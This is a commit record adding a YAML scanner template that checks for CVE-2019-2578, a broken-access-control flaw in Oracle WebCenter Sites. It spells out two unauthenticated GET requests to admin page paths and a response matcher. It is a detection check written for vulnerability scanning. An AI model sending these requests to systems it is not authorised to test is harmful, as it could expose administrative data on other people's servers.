Merge pull request #3091 from Leovalcante/cve-2019-2578

create check for cve-2019-2578
2021-11-06 13:46:53 +05:30 · 2021-11-06 13:46:53 +05:30 · 4b3172c754
parent 3a9fcc7cc0 e4cda81745
commit 4b3172c754
1 changed files with 27 additions and 0 deletions
--- a/cves/2019/CVE-2019-2578.yaml
+++ b/cves/2019/CVE-2019-2578.yaml
@ -0,0 +1,27 @@
+id: CVE-2019-2578
+
+info:
+  name: Broken Access Control Oracle WebCenter Sites
+  author: leovalcante
+  severity: high
+  description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
+  reference: https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
+  tags: cve,cve2019,oracle,wcs,auth-bypass
+
+
+requests:
+  - raw:
+      - |
+        GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
+        Host: {{Hostname}}
+
+    stop-at-first-match: true
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '<script[\d\D]*<throwexception/>'